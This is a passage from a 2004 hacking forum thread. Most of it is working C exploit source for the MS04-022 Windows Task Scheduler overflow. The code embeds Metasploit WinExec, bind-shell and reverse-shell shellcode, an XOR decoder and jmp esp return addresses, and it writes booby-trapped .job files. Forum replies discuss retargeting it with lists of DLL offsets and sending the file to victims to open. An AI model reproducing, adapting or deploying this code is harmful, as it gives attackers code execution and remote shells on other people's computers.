"\xff\xff\xff\xff\x46\x00\xff\xff\x00\x00\x00\x00\x3c\x00\x0a\x00"
"\x20\x00\x00\x00\x00\x14\x73\x0f\x00\x00\x00\x00\x05\x13\x04\x00"
"\x00\x00\x00\x21\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00";
unsigned char Job_Part2[] =
"\x00\x00\x00\x00\x05\x00\x72\x00\x6f\x00\x6f\x00\x74\x00\x00\x00"
"\x00\x00\x00\x00\x08\x00\x03\x13\x04\x00\x00\x00\x00\x00\x00\x00";

unsigned char Jump[] = "\xeb\xe1"; // jmp short -29
unsigned char Jump2[] = "\xe9\x02\xfe\xff\xff"; // jmp -505
unsigned char Stack[] = "\x66\x81\xec\xd0\x07"; // inc ecx (nop)
// sub sp, 1000
// payload xor decoder
unsigned char Decoder[] =
"\xd9\xee\xd9\x74\x24\xf4\x5b\x80\xeb\xe9\x31\xc9\x66\x81\xe9\x00"
"\x80\x80\x33\xff\x43\xe2\xfa";
/*
[BITS 32]

; get EIP
fldz
fnstenv [esp-12]
pop ebx
sub bl, -23; to payload

; payload size
xor ecx, ecx
sub cx, -32768

xor_loop:
xor byte [ebx], 0xff
inc ebx
loop xor_loop
*/
#define DECODER_SIZE_OFFSET 15
#define DECODER_XOR_OFFSET 19

#define PAYLOAD_LEN_LIMIT ( 504 - ( sizeof( Stack ) - 1 ) - ( sizeof( Decoder ) - 1 ) )

/* win32_exec - Raw Shellcode [ EXITFUNC=thread CMD= FIXSTACK=1 Size=161 ] http://metasploit.com */
unsigned char Paylaod_WinExec[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\xeb\x18\x53\x68\x98\xfe\x8a\x0e"
"\xff\xd6\xff\xd0\x53\x68\xef\xce\xe0\x60\xff\xd6\x6a\x00\xff\xd0"
"\xff\xd0\x6a\x00\xe8\xe1\xff\xff\xff"/*\x00"*/;

/* win32_bind - Raw Shellcode [ EXITFUNC=thread LPORT=4444 Size=375 ] http://metasploit.com */
unsigned char Payload_BindShell[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x27\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xe5\x49\x86\x49\xa4\x1a\x70\xc7\xa4\xad\x2e\xe9"
"\xd9\x09\xf5\xad\xcb\xed\xfc\x3b\x57\x53\x32\x5f\x33\x32\x00\x5b"
"\x8d\x4b\x20\x51\xff\xd7\x89\xdf\x89\xc3\x8d\x75\x14\x6a\x07\x59"
"\x51\x53\xff\x34\x8f\xff\x55\x04\x59\x89\x04\x8e\xe2\xf2\x2b\x27"
"\x54\xff\x37\xff\x55\x30\x31\xc0\x50\x50\x50\x50\x40\x50\x40\x50"
"\xff\x55\x2c\x89\xc7\x31\xdb\x53\x53\x68\x02\x00\x11\x5c\x89\xe0"
"\x6a\x10\x50\x57\xff\x55\x24\x53\x57\xff\x55\x28\x53\x54\x57\xff"
"\x55\x20\x89\xc7\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d"
"\x7c\x24\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24"
"\x10\x44\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24"
"\x4c\x89\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51"
"\x49\x51\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04"
"\xff\xd0\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89"
"\xc3\x6a\xff\xff\x36\xff\xd3\xff\x75\x00\x68\xef\xce\xe0\x60\xff"
"\x55\x04\x31\xdb\x53\xff\xd0";
#define BINDSHELL_PORT_OFFSET 236

/* win32_reverse - Raw Shellcode [ EXITFUNC=thread LHOST=127.0.0.1 LPORT=4321 FIXSTACK=1 Size=357 ] http://metasploit.com */
unsigned char Payload_ReverseShell[] =
"\xfc\xe8\x56\x00\x00\x00\x53\x55\x56\x57\x8b\x6c\x24\x18\x8b\x45"
"\x3c\x8b\x54\x05\x78\x01\xea\x8b\x4a\x18\x8b\x5a\x20\x01\xeb\xe3"
"\x32\x49\x8b\x34\x8b\x01\xee\x31\xff\xfc\x31\xc0\xac\x38\xe0\x74"
"\x07\xc1\xcf\x0d\x01\xc7\xeb\xf2\x3b\x7c\x24\x14\x75\xe1\x8b\x5a"
"\x24\x01\xeb\x66\x8b\x0c\x4b\x8b\x5a\x1c\x01\xeb\x8b\x04\x8b\x01"
"\xe8\xeb\x02\x31\xc0\x5f\x5e\x5d\x5b\xc2\x08\x00\x5e\x6a\x30\x59"
"\x64\x8b\x19\x8b\x5b\x0c\x8b\x5b\x1c\x8b\x1b\x8b\x5b\x08\x53\x68"
"\x8e\x4e\x0e\xec\xff\xd6\x89\xc7\x81\xec\x00\x01\x00\x00\x57\x56"
"\x53\x89\xe5\xe8\x1f\x00\x00\x00\x90\x01\x00\x00\xb6\x19\x18\xe7"
"\xa4\x19\x70\xe9\xec\xf9\xaa\x60\xd9\x09\xf5\xad\xcb\xed\xfc\x3b"
"\x57\x53\x32\x5f\x33\x32\x00\x5b\x8d\x4b\x18\x51\xff\xd7\x89\xdf"
"\x89\xc3\x8d\x75\x14\x6a\x05\x59\x51\x53\xff\x34\x8f\xff\x55\x04"
"\x59\x89\x04\x8e\xe2\xf2\x2b\x27\x54\xff\x37\xff\x55\x28\x31\xc0"
"\x50\x50\x50\x50\x40\x50\x40\x50\xff\x55\x24\x89\xc7\x68\x7f\x00"
"\x00\x01\x68\x02\x00\x10\xe1\x89\xe1\x6a\x10\x51\x57\xff\x55\x20"
"\x59\x59\x68\x43\x4d\x44\x00\x89\xe3\x87\xfa\x31\xc0\x8d\x7c\x24"
"\xac\x6a\x15\x59\xf3\xab\x87\xfa\x83\xec\x54\xc6\x44\x24\x10\x44"
"\x66\xc7\x44\x24\x3c\x01\x01\x89\x7c\x24\x48\x89\x7c\x24\x4c\x89"
"\x7c\x24\x50\x8d\x44\x24\x10\x54\x50\x51\x51\x51\x41\x51\x49\x51"
"\x51\x53\x51\xff\x75\x00\x68\x72\xfe\xb3\x16\xff\x55\x04\xff\xd0"
"\x89\xe6\xff\x75\x00\x68\xad\xd9\x05\xce\xff\x55\x04\x89\xc3\x6a"
"\xff\xff\x36\xff\xd3\xff\x75\x00\x68\xef\xce\xe0\x60\xff\x55\x04"
"\x31\xdb\x53\xff\xd0";
#define REVERSESHELL_IP_OFFSET 222
#define REVERSESHELL_PORT_OFFSET 229

#define PAYLOAD_ID_WINEXEC 0
#define PAYLOAD_ID_BIND 1
#define PAYLOAD_ID_REVERSE 2

typedef struct
{
const char* pszName;
unsigned long nNewEIP;
} Target;
Target Targets[] =
{
// { "Windows XP SP0+1 GER", 0x75981d71 }, // MSGINA.dll, jmp esp
{ "Windows XP SP0+1 GER", 0x7356a647 }, // mstask.dll, jmp esp
{ "DoS Windows XP ALL", 0xffffffff },
};

bool CreateJobFile( const char *pszFile, const unsigned char *pApplicationName, unsigned long nApplicationNameLen )
{
unsigned long nJobDataSize;
unsigned char *pJobData;
unsigned long nJobDataPos;

// alloc memory
nJobDataSize = ( sizeof( Job_Part1 ) - 1 ) + sizeof( unsigned short ) + nApplicationNameLen + sizeof( wchar_t ) + ( sizeof( Job_Part2 ) - 1 );
pJobData = (unsigned char*)malloc( nJobDataSize );
if( !pJobData )
{
printf( "[-] out of memory\n" );
return false;
}
// clean
memset( pJobData, 0x00, nJobDataSize );

nJobDataPos = 0;

// add...
// ...first part
memcpy( &pJobData[ nJobDataPos ], Job_Part1, sizeof( Job_Part1 ) - 1 );
nJobDataPos += sizeof( Job_Part1 ) - 1;

//...application name len (string length + NULL-termination wchar)
*(unsigned short*)&pJobData[ nJobDataPos ] = (unsigned short)( ( nApplicationNameLen / sizeof( wchar_t ) ) + 1 );
nJobDataPos += sizeof( unsigned short );

// ...application name
memcpy( &pJobData[ nJobDataPos ], pApplicationName, nApplicationNameLen );
nJobDataPos += nApplicationNameLen;

// ...application name NULL-string-termination wchar
*(wchar_t*)&pJobData[ nJobDataPos ] = 0;
nJobDataPos += sizeof( wchar_t );

// ...second part
memcpy( &pJobData[ nJobDataPos ], Job_Part2, sizeof( Job_Part2 ) - 1 );
nJobDataPos += sizeof( Job_Part2 ) - 1;

// open file
FILE *pOutFile = fopen( pszFile, "wb" );
if( !pOutFile )
{
printf( "[-] couldn't open file\n" );

free( pJobData );
return false;
}

// write
if( fwrite( pJobData, 1, nJobDataSize, pOutFile ) != nJobDataSize )
{
printf( "[-] failed to write to file\n" );

fclose( pOutFile );
free( pJobData );
return false;
}

// clean up
fclose( pOutFile );
free( pJobData );

return true;
}

bool CreateJobFilePayload( const char *pszFile, const unsigned char *pPayload, unsigned long nPayloadLen, unsigned long nEIP )
{
bool bFoundXOR;
unsigned char cXORKey;
unsigned char PayloadXOR[ PAYLOAD_LEN_LIMIT ];
unsigned char ExploitData[ OVERFLOW_SIZE ];
int nExploitDataPos;

// test size rule
if( nPayloadLen > PAYLOAD_LEN_LIMIT )
{
printf( "[-] your payload size of %u exeeds the limit of %u\n", nPayloadLen, PAYLOAD_LEN_LIMIT );
return false;
}

// set up decoder and xor
memset( PayloadXOR, 0x00, sizeof( PayloadXOR ) );

// ...payload size
*(short*)&Decoder[ DECODER_SIZE_OFFSET ] = -( (short)nPayloadLen );

// find xor key
for( cXORKey = 0x01; cXORKey < 0xff; cXORKey++ )
{
bFoundXOR = false;

Decoder[ DECODER_XOR_OFFSET ] = cXORKey;
for( unsigned long n = 0; n < nPayloadLen; n++ )
{
PayloadXOR[ n ] = pPayload[ n ] ^ cXORKey;

// bad chars (I don't know if this is correct! - these chars are guessed!!!)
if( (char)PayloadXOR[ n ] == '\x00' ||
(char)PayloadXOR[ n ] == '\x0a' ||
(char)PayloadXOR[ n ] == '\x0d' ||
(char)PayloadXOR[ n ] == '\x25' ||
(char)PayloadXOR[ n ] == '\x26' ||
(char)PayloadXOR[ n ] == '\x3d' ||
(char)PayloadXOR[ n ] == '\x3f' ||
(char)PayloadXOR[ n ] == '\x40' ||
(char)PayloadXOR[ n ] == '\xfe' ||
(char)PayloadXOR[ n ] == '\xff' )
{
bFoundXOR = false;
break;
}
else
bFoundXOR = true;

}

// found?
if( bFoundXOR )
break;
}
if( !bFoundXOR )
{
printf( "[-] couldn't find an suitable xor key\n" );
return false;
}

// fill with NOPs (using inc ecx instead of nop)
memset( ExploitData, 0x41, sizeof( ExploitData ) );

// set up exploits data
nExploitDataPos = 0;

// ...add stack "alloc"
memcpy( &ExploitData[ nExploitDataPos ], Stack, sizeof( Stack ) - 1 );
nExploitDataPos += sizeof( Stack ) - 1;

// ...add decoder
memcpy( &ExploitData[ nExploitDataPos ], Decoder, sizeof( Decoder ) - 1 );
nExploitDataPos += sizeof( Decoder ) - 1;

// ...add payload
memcpy( &ExploitData[ nExploitDataPos ], PayloadXOR, nPayloadLen );
nExploitDataPos += nPayloadLen;

// ...new EIP
*(unsigned long*)&ExploitData[ 518 ] = nEIP;

// ...add jump backward (first jump)
memcpy( &ExploitData[ 534 ], Jump, sizeof( Jump ) - 1 );

// ...add jump backward (second jump)
memcpy( &ExploitData[ 505 ], Jump2, sizeof( Jump2 ) - 1 );

return CreateJobFile( pszFile, ExploitData, sizeof( ExploitData ) );
}

void usage( const char *argv0 )
{
int n;

printf( "usage: %s <TargetID> <PayloadID> <OutputJobFile> < <Command> | <BindPort> | <IP> <Port> >\n", argv0 );

printf( "\n" );

// TargetIDs
printf( "%-8s %-35s %s\n", "TargetID", "Name", "EIP" );
printf( "----------------------------------------------------------\n" );
for( n = 0; n < sizeof( Targets ) / sizeof( Target ); n++ )
printf( "%-8i %-35s 0x%08x\n", n, Targets[ n ].pszName, Targets[ n ].nNewEIP );

printf( "\n" );

// PayloadIDs
printf( "%-9s %s\n", "PayloadID", "Name" );
printf( "--------------------------\n" );
printf( "%-9i %s\n", PAYLOAD_ID_WINEXEC, "WinExec" );
printf( "%-9i %s\n", PAYLOAD_ID_BIND, "BindShell" );
printf( "%-9i %s\n", PAYLOAD_ID_REVERSE, "ReverseShell" );
}

int main( int argc, char **argv )
{
int nTargetID;
int nPayloadID;
char *pszJobFile;
unsigned int nWinExecSize;
unsigned char *pWinExec;
unsigned short nPort;
unsigned long nIP;
bool bCreated;

// banner
printf( "+----------------------------------+\n" );
printf( "| MS04-022 Task Scheduler Exploits |\n" );
printf( "| by ScriptGod |\n" );
printf( "+----------------------------------+\n" );
printf( "| version of 31.07.04 |\n" );
printf( "+----------------------------------+\n" );

// get parameter
if( argc < 5 )
{
usage( argv[ 0 ] );
return 0;
}
nTargetID = atoi( argv[ 1 ] );
nPayloadID = atoi( argv[ 2 ] );
pszJobFile = argv[ 3 ];
if( nTargetID >= sizeof( Targets ) / sizeof( Target ) || nPayloadID >= 3 ||
( nPayloadID == PAYLOAD_ID_REVERSE && argc < 6 ) )
{
usage( argv[ 0 ] );
return 0;
}

// user info
printf( "[+] creating for Target '%s' with ", Targets[ nTargetID ].pszName );

// create
bCreated = false;
if( nPayloadID == PAYLOAD_ID_WINEXEC )
{
printf( "WinExec payload\n" );
printf( "[+] command: %s\n", argv[ 4 ] );

// build payload
nWinExecSize = ( sizeof( Paylaod_WinExec ) - 1 ) + ( strlen( argv[ 4 ] ) + 1 );
pWinExec = (unsigned char*)malloc( nWinExecSize );
if( !pWinExec )
{
printf( "[-] out of memory\n" );
return 0;
}
memset( pWinExec, 0x00, nWinExecSize );
memcpy( pWinExec, Paylaod_WinExec, sizeof( Paylaod_WinExec ) - 1 );
strcpy( (char*)&pWinExec[ sizeof( Paylaod_WinExec ) - 1 ], argv[ 4 ] );

bCreated = CreateJobFilePayload( pszJobFile, pWinExec, nWinExecSize, Targets[ nTargetID ].nNewEIP );
}
else if( nPayloadID == PAYLOAD_ID_BIND )
{
printf( "BindShell payload\n" );

// info
nPort = (unsigned short)atoi( argv[ 4 ] );
printf( "[+] port: %i\n", nPort );

// change byte order
nPort = htons( nPort );

// set
*(unsigned short*)&Payload_BindShell[ BINDSHELL_PORT_OFFSET ] = nPort;

// create
bCreated = CreateJobFilePayload( pszJobFile, Payload_BindShell, sizeof( Payload_BindShell ) - 1, Targets[ nTargetID ].nNewEIP );
}
else if( nPayloadID == PAYLOAD_ID_REVERSE )
{
printf( "ReverseShell payload\n" );

// info
nIP = inet_addr( argv[ 4 ] );
nPort = (unsigned short)atoi( argv[ 5 ] );
printf( "[+] connect to: %s:%i\n", argv[ 4 ], nPort );

// change byte order
nPort = htons( nPort );

// set
*(unsigned long*)&Payload_ReverseShell[ REVERSESHELL_IP_OFFSET ] = nIP;
*(unsigned short*)&Payload_ReverseShell[ REVERSESHELL_PORT_OFFSET ] = nPort;

// create
bCreated = CreateJobFilePayload( pszJobFile, Payload_ReverseShell, sizeof( Payload_ReverseShell ) - 1, Targets[ nTargetID ].nNewEIP );
}

// user info
if( bCreated )
printf( "[+] job file '%s' created\n", pszJobFile );
else
printf( "[-] job file creation failed\n" );

return 0;
}

tibbar

Aug 1 2004, 11:05 PM

i thought id prevent the lame requests coming in - updated version attached.

enjoy.

mortello

Aug 2 2004, 03:00 AM

QUOTE (tibbar @ Aug 1 2004, 11:05 PM)

i thought id prevent the lame requests coming in - updated version attached.

enjoy.

LoL, good thinking....will pass on it tho

net_runner

Aug 2 2004, 09:01 AM

isnt dangerous people unable to compile running xploits?

mortello

Aug 2 2004, 02:38 PM

QUOTE (net_runner @ Aug 2 2004, 09:01 AM)

isnt dangerous people unable to compile running xploits?

yes, but they would ask for it anyway, so in that case it prevents unnecessary posts and that way we keep up to the code

=k3Rn=

Aug 3 2004, 04:39 AM

can you use this remotly?
i couldn't find any explanation on chonker.com

http://www.cnhonker.com/index.php?module=e...w&type=9&id=600

flashb4ck

Aug 4 2004, 12:54 PM

hm i tried to change the code for a usage with mozilla so that it'll be a self executable cause mozilla / ie connect silent to the internet

sry for my weak english ...

gr€€tz fL4Shb4Ck

what

Aug 4 2004, 03:45 PM

Okay, hopefully this won't be a dumb question, but I'm going to ask it anyways.

I was looking through your code, and I noticed that it only exploited Windows XP SP0+1 GER and no others, but you could DoS them all. So I was wondering, to change the "jmp esp" to another windows version, would you use kernel32.dll or the ACTIVEDS.dll found in the code. I'll try both, but I was just wondering.

P.S.

Did some research on metasploit:

In ACTIVEDS.dll, we had all of these options

jmp esp 0x76e61a21
jmp esp 0x76e61cd2
jmp esp 0x76e61cd6
jmp esp 0x76e61cda
jmp esp 0x76e61cde
jmp esp 0x76e61ce2
jmp esp 0x76e61ce6
jmp esp 0x76e61cea
jmp esp 0x76e61cee
jmp esp 0x76e61cf2
jmp esp 0x76e61cf6
jmp esp 0x76e61cfa
jmp esp 0x76e62e4f

and in kernel32.dll, we have nothing, and in ntdll.dll we have

0x77fb4dcc

Sorry about the question again, this year I'm taking AP computer science, which should clear everything up.

mortello

Aug 4 2004, 03:47 PM

QUOTE (=k3Rn= @ Aug 3 2004, 04:39 AM)

can you use this remotly?
i couldn't find any explanation on chonker.com

http://www.cnhonker.com/index.php?module=e...w&type=9&id=600

didn't I write this to you already ? and isn't it earlier in this thread also ?

anyway, its a LOCAL vulnerability, this cannot be scanned for !

However, if you manage to send it to someone and that he executes the .job file (I guess he only needs to go to that directory where it is from what I understand)...

mortello

Aug 4 2004, 03:49 PM

QUOTE (what @ Aug 4 2004, 03:45 PM)

Okay, hopefully this won't be a dumb question, but I'm going to ask it anyways.

I was looking through your code, and I noticed that it only exploited Windows XP SP0+1 GER and no others, but you could DoS them all. So I was wondering, to change the "jmp esp" to another windows version, would you use kernel32.dll or the ACTIVEDS.dll found in the code. I'll try both, but I was just wondering.

P.S.

Did some research on metasploit:

In ACTIVEDS.dll, we had all of these options

jmp esp 0x76e61a21
jmp esp 0x76e61cd2
jmp esp 0x76e61cd6
jmp esp 0x76e61cda
jmp esp 0x76e61cde
jmp esp 0x76e61ce2
jmp esp 0x76e61ce6
jmp esp 0x76e61cea
jmp esp 0x76e61cee
jmp esp 0x76e61cf2
jmp esp 0x76e61cf6
jmp esp 0x76e61cfa
jmp esp 0x76e62e4f

and in kernel32.dll, we have nothing, and in ntdll.dll we have

0x77fb4dcc

Sorry about the question again, this year I'm taking AP computer science, which should clear everything up.

Not so stupid in fact....

I believe its the ACTIVEDS.dll and not the kernel32.dll one that you need to use since the kernel32.dll one is needed to run the code, and that's about it (for this vulnerability at least)

So you should have more luck using the values you found if you can make them correspond to another Win version

what

Aug 4 2004, 04:38 PM

Ok, I've been reading up a little on buffer/stack overflows, and I have another question.

So, we find an overflow in a program, and overflow it with x's. This causes a segmentation fault by overflowing the return address with x's and making it point to 0x787878 to execute code, which is hex for x. Since 0x787878 does not have any instructions, it causes the segmentation fault. Say our return address is 0x80484d0, and our code that we want to execute is at 0x80484cb. This is the part where I start to get lost.

I got all of this information from http://www.securiteam.com/securityreviews/5OP0B006UQ.html if you want to help me out. They use a program to try to explain it, but to tell you the truth I'm not quite sure what the program is doing. Any help would be great.

ScriptGod

Aug 4 2004, 09:22 PM

QUOTE (what @ Aug 4 2004, 03:45 PM)

Okay, hopefully this won't be a dumb question, but I'm going to ask it anyways.

I was looking through your code, and I noticed that it only exploited Windows XP SP0+1 GER and no others, but you could DoS them all. So I was wondering, to change the "jmp esp" to another windows version, would you use kernel32.dll or the ACTIVEDS.dll found in the code. I'll try both, but I was just wondering.

P.S.

Did some research on metasploit:

In ACTIVEDS.dll, we had all of these options

jmp esp 0x76e61a21
jmp esp 0x76e61cd2
jmp esp 0x76e61cd6
jmp esp 0x76e61cda
jmp esp 0x76e61cde
jmp esp 0x76e61ce2
jmp esp 0x76e61ce6
jmp esp 0x76e61cea
jmp esp 0x76e61cee
jmp esp 0x76e61cf2
jmp esp 0x76e61cf6
jmp esp 0x76e61cfa
jmp esp 0x76e62e4f

and in kernel32.dll, we have nothing, and in ntdll.dll we have

0x77fb4dcc

Sorry about the question again, this year I'm taking AP computer science, which should clear everything up.

- kernel32.dll changes through the service packs, so offsets are not universal...
- ACTIVEDS.dll, is not loaded in IExplorer.exe
- mstask.dll is loaded by both, and in this the bug is located so there is no much version confilics in the offset...

however I realized when writting some other exploits, that the offsets for EU version are allmost the same, except the English versions. Because there the most dlls are loaded at a different base.

ScriptGod

Aug 4 2004, 09:27 PM

QUOTE (what @ Aug 4 2004, 04:38 PM)

Ok, I've been reading up a little on buffer/stack overflows, and I have another question.

So, we find an overflow in a program, and overflow it with x's. This causes a segmentation fault by overflowing the return address with x's and making it point to 0x787878 to execute code, which is hex for x. Since 0x787878 does not have any instructions, it causes the segmentation fault. Say our return address is 0x80484d0, and our code that we want to execute is at 0x80484cb. This is the part where I start to get lost.

I got all of this information from http://www.securiteam.com/securityreviews/5OP0B006UQ.html if you want to help me out. They use a program to try to explain it, but to tell you the truth I'm not quite sure what the program is doing. Any help would be great.

Yes this is correct.
{ "DoS Windows XP ALL", 0xffffffff },
This will set the return address to 0xffffffff. This is never valid, so this will crash the applictation. However under windows this will cause no segmentation fault - it will cause a access fault, because this address is reservecd for the kernel and can't be accessed in user mode.